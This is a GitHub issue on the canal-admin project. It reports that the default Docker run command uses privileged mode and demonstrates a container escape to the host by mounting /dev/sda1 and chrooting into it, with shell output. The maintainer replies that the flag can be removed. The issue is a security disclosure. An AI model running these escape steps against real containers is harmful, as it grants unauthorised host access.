canal/canal-admin 默认启动的docker容器存在docker逃逸问题

[wxi3]

• [* ] I have searched the issues of this repository and believe that this is not a duplicate.
• [ *] I have checked the FAQ of this repository and believe that this is not a duplicate.

environment

• canal/canal-admin 1.1.8
• mysql version

Issue Description

canal-admin 默认的启动命令

实际的启动命令

docker run -d --privileged=true -it -h 192.168.88.42 -e server.port=8089 -e canal.adminUser=admin -e canal.adminPasswd=admin --name=canal-admin -p 8089:8089 -m 1024m canal/canal-admin

该方式启动使用了特权模式，会导致可直接逃逸到宿主机内

Steps to reproduce

[root@192 admin]# mkdir /tmp/mnt
[root@192 admin]# fdisk -l

Disk /dev/sda: 32.2 GB, 32212254720 bytes, 62914560 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x000a1816

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048    62914526    31456239+  83  Linux
[root@192 admin]# mount /dev/sda1 /tmp/mnt
[root@192 admin]# cd /tmp/mnt
[root@192 mnt]# chroot ./ bash
[root@192 /]# ls
bin  boot  data  dev  etc  home  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var

Expected behaviour

Actual behaviour

If there is an exception, please attach the exception trace:

Just put your stack trace here!

[agapple]

# systemctl start sshd
# systemctl start crond

已经去掉了systemctl的启动，可以忽略掉特权启动的属性